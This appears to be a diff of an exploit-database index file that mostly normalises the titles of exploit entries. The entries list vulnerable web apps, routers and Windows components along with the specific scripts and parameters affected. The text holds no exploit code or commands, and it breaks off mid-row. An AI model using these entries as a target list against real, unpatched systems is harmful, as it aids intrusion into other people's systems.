+38848,platforms/php/webapps/38848.php,"WordPress Suco Themes - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,Metasploit,cgi,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38852,platforms/php/webapps/38852.pl,"PHPThumb - 'PHPThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0 38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0 38854,platforms/linux/dos/38854.sh,"Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",linux,dos,0 -38855,platforms/php/webapps/38855.txt,"Wordpress Users Ultra Plugin 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0 -38856,platforms/php/webapps/38856.txt,"Wordpress Users Ultra Plugin 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 +38855,platforms/php/webapps/38855.txt,"WordPress Users Ultra Plugin 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0 +38856,platforms/php/webapps/38856.txt,"WordPress Users Ultra Plugin 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38857,platforms/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",linux,dos,0 -38858,platforms/windows/dos/38858.txt,"Malwarebytes Antivirus 2.2.0 - Denial of Service (PoC)",2015-12-03,"Francis Provencher",windows,dos,0 +38858,platforms/windows/dos/38858.txt,"Malwarebytes AntiVirus 2.2.0 - Denial of Service (PoC)",2015-12-03,"Francis Provencher",windows,dos,0 38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation()",2015-12-03,Metasploit,windows,remote,7777 38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,Metasploit,windows,remote,7777 -38861,platforms/php/webapps/38861.txt,"Wordpress Gwolle GuestBook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 +38861,platforms/php/webapps/38861.txt,"WordPress Gwolle Guestbook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 38865,platforms/php/webapps/38865.txt,"NeoBill - /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 -38867,platforms/php/webapps/38867.txt,"Wordpress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 -38868,platforms/php/webapps/38868.txt,"Wordpress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 -38869,platforms/php/webapps/38869.txt,"Wordpress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 -38870,platforms/php/webapps/38870.txt,"Wordpress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 +38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 +38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 +38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 +38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,windows,local,0 -38872,platforms/php/webapps/38872.php,"Wordpress PhotoSmash Galleries Plugin - 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 +38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin - 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 38873,platforms/php/webapps/38873.txt,"eduTrac - 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 38874,platforms/php/webapps/38874.txt,"BoastMachine - 'blog' Parameter SQL Injection",2013-12-13,"Omar Kurt",php,webapps,0 38875,platforms/php/webapps/38875.php,"osCMax - Arbitrary File Upload / Full Path Information Disclosure",2013-12-09,KedAns-Dz,php,webapps,0 @@ -35161,7 +35164,7 @@ id,file,description,date,author,platform,type,port 38899,platforms/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,xml,webapps,0 38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution",2015-12-08,Metasploit,php,remote,80 38901,platforms/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,php,webapps,80 -38902,platforms/php/webapps/38902.txt,"Wordpress Polls Widget Plugin 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 +38902,platforms/php/webapps/38902.txt,"WordPress Polls Widget Plugin 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 38904,platforms/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection",2015-12-08,Metasploit,multiple,remote,8080 @@ -35171,29 +35174,29 @@ id,file,description,date,author,platform,type,port 38909,platforms/linux/dos/38909.txt,"DenyHosts - 'regex.py' Remote Denial of Service",2013-12-19,"Helmut Grohne",linux,dos,0 38910,platforms/windows/remote/38910.txt,"Hancom Office - '.hml' File Processing Heap Buffer Overflow",2013-12-19,diroverflow,windows,remote,0 38911,platforms/windows/remote/38911.txt,"Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File",2015-12-09,"Eduardo Braun Prado",windows,remote,0 -38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center - .Link File Incorrectly Resolved Reference",2015-12-09,"Core Security",windows,remote,0 +38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference",2015-12-09,"Core Security",windows,remote,0 38913,platforms/hardware/webapps/38913.txt,"WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 38914,platforms/hardware/webapps/38914.txt,"WIMAX MT711x - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 -38915,platforms/php/webapps/38915.txt,"Wordpress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,php,webapps,80 +38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,php,webapps,80 38916,platforms/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 -38917,platforms/osx/dos/38917.txt,"Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 +38917,platforms/osx/dos/38917.txt,"Apple Mac OS X 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote,0 -38924,platforms/php/webapps/38924.txt,"Wordpress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0 +38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80 38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0 -38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed Executables",2015-12-10,"Google Security Research",multiple,dos,0 +38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0 38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 38933,platforms/multiple/dos/38933.txt,"Avast - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 38934,platforms/windows/dos/38934.txt,"Avast - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0 -38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for Wordpress - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 +38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0 38938,platforms/php/webapps/38938.txt,"xBoard - 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 @@ -35214,11 +35217,11 @@ id,file,description,date,author,platform,type,port 38954,platforms/php/webapps/38954.txt,"Command School Student Management System - /sw/admin_school_names.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38955,platforms/php/webapps/38955.txt,"Command School Student Management System - /sw/admin_subjects.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38956,platforms/php/webapps/38956.txt,"Command School Student Management System - /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 -38957,platforms/php/webapps/38957.html,"Command School Student Management System - /sw/Admin_change_password.php Admin Password Manipulation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38957,platforms/php/webapps/38957.html,"Command School Student Management System - /sw/Admin_change_Password.php Admin Password manipulation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38958,platforms/php/webapps/38958.html,"Command School Student Management System - /sw/add_topic.php Topic Creation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - productdtl.php (prodid) SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 -38966,platforms/php/webapps/38966.txt,"Wordpress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 +38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 39097,platforms/linux/remote/39097.txt,"Red Hat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 @@ -35228,9 +35231,9 @@ id,file,description,date,author,platform,type,port 38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object - DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0 38969,platforms/multiple/dos/38969.txt,"Adobe Flash - Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0 38970,platforms/multiple/dos/38970.txt,"Adobe Flash - Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos,0 -38971,platforms/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Path Traversal",2015-12-14,"Jake Reynolds",hardware,webapps,80 +38971,platforms/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Directory Traversal",2015-12-14,"Jake Reynolds",hardware,webapps,80 38972,platforms/windows/dos/38972.html,"Microsoft Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free (MS15-124)",2015-12-14,"Moritz Jodeit",windows,dos,0 -38973,platforms/multiple/remote/38973.rb,"Legend Perl IRC Bot - Remote Code Execution Exploit",2015-12-14,Metasploit,multiple,remote,0 +38973,platforms/multiple/remote/38973.rb,"Legend Perl IRC Bot - Remote Code Execution",2015-12-14,Metasploit,multiple,remote,0 38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution",2015-12-14,Metasploit,multiple,remote,0 38975,platforms/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80 38976,platforms/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80 @@ -35244,10 +35247,10 @@ id,file,description,date,author,platform,type,port 38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80 38985,platforms/php/webapps/38985.txt,"Dredge School Administration System - /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38986,platforms/php/webapps/38986.txt,"Dredge School Administration System - /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 -38987,platforms/php/webapps/38987.html,"Dredge School Administration System - /DSM/loader.php Admin Account Manipulation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38987,platforms/php/webapps/38987.html,"Dredge School Administration System - /DSM/loader.php Admin Account manipulation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38988,platforms/php/webapps/38988.txt,"Dredge School Administration System - /DSM/Backup/processbackup.php Database Backup Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 -38991,platforms/php/webapps/38991.pl,"Ovidentia newsletter Module 2.2 - 'admin.php' Remote File Inclusion Exploit",2015-12-16,bd0rk,php,webapps,80 +38991,platforms/php/webapps/38991.pl,"Ovidentia NewsLetter Module 2.2 - 'admin.php' Remote File Inclusion",2015-12-16,bd0rk,php,webapps,80 38992,platforms/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 38993,platforms/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow",2015-12-16,"Google Security Research",multiple,dos,0 38994,platforms/multiple/dos/38994.txt,"Wireshark - wmem_alloc Assertion Failure",2015-12-16,"Google Security Research",multiple,dos,0 @@ -35281,16 +35284,16 @@ id,file,description,date,author,platform,type,port 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0 40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0 -39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 -39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win_x86,dos,0 +39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 +39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos,0 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0 39028,platforms/php/webapps/39028.txt,"Joomla! Sexy Polling Extension - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 -39029,platforms/php/webapps/39029.txt,"bloofoxCMS - /bloofox/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39030,platforms/php/webapps/39030.txt,"bloofoxCMS - /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39031,platforms/php/webapps/39031.html,"bloofoxCMS - /Admin/index.php Admin User Creation Cross-Site Request Forgery",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39032,platforms/php/webapps/39032.txt,"bloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39033,platforms/php/webapps/39033.py,"Joomla 1.5 < 3.4.5 - Object Injection Remote Code Execution X-Forwarded-For Header",2015-12-18,"Andrew McNicol",php,webapps,80 -39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion Exploit",2015-12-18,bd0rk,php,webapps,80 +39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php username Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39031,platforms/php/webapps/39031.html,"BloofoxCMS - /Admin/index.php Admin User Creation Cross-Site Request Forgery",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39032,platforms/php/webapps/39032.txt,"BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39033,platforms/php/webapps/39033.py,"Joomla 1.5 < 3.4.5 - Object Injection Remote Code Execution x-forwarded-for Header",2015-12-18,"Andrew McNicol",php,webapps,80 +39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0 39099,platforms/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0 @@ -35314,18 +35317,18 @@ id,file,description,date,author,platform,type,port 39055,platforms/windows/dos/39055.txt,"Adobe Flash MovieClip.attachMovie - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39056,platforms/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39058,platforms/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",php,webapps,0 -39059,platforms/php/webapps/39059.txt,"Wordpress Global Flash Gallery Plugin - 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0 +39059,platforms/php/webapps/39059.txt,"WordPress Global Flash Gallery Plugin - 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0 39060,platforms/php/webapps/39060.txt,"XOS Shop - 'goto' Parameter SQL Injection",2014-01-24,JoKeR_StEx,php,webapps,0 39061,platforms/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 39062,platforms/php/webapps/39062.txt,"ZenPhoto - SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0 -39063,platforms/php/webapps/39063.txt,"Wordpress WP e-Commerce Plugin - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 +39063,platforms/php/webapps/39063.txt,"WordPress WP E-Commerce Plugin - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39065,platforms/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0 39066,platforms/php/webapps/39066.txt,"Eventum - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0 39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0 39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution Exploit",2015-12-21,bd0rk,php,webapps,80 -39070,platforms/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - SEH OverWrite (PoC)",2015-12-21,Un_N0n,windows,dos,0 +39070,platforms/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - SEH Overwrite (PoC)",2015-12-21,Un_N0n,windows,dos,0 39072,platforms/win_x86-64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win_x86-64,dos,0 39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/reboot.cgi Unauthenticated Remote Reboot Denial of Service",2014-02-03,"Josue Rojas",cgi,dos,0 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 @@ -35345,35 +35348,35 @@ id,file,description,date,author,platform,type,port 39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 -39090,platforms/php/webapps/39090.php,"Wordpress Kiddo Theme - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 +39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0 39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 -39100,platforms/php/webapps/39100.txt,"Wordpress NextGEN Gallery Plugin - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps,0 -39101,platforms/php/webapps/39101.php,"MODx Evogallery Module - 'uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps,0 +39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps,0 +39101,platforms/php/webapps/39101.php,"MODx Evogallery Module - 'Uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps,0 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0 -39106,platforms/asp/webapps/39106.txt,"eshtery CMS - ' FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 +39106,platforms/asp/webapps/39106.txt,"eshtery CMS - 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 39107,platforms/php/webapps/39107.txt,"ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 -39109,platforms/php/webapps/39109.txt,"Wordpress Relevanssi Plugin - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 +39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search - 'cid' Parameter SQL Injection",2014-03-05,Slotleet,php,webapps,0 -39111,platforms/php/webapps/39111.php,"Wordpress Premium Gallery Manager Plugin - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 -39112,platforms/linux/local/39112.txt,"QNX - .Phgrafx File Enumeration",2014-03-10,cenobyte,linux,local,0 +39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 +39112,platforms/linux/local/39112.txt,"QNX - '.Phgrafx' File Enumeration",2014-03-10,cenobyte,linux,local,0 39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Parameter Multiple SQL Injection",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security 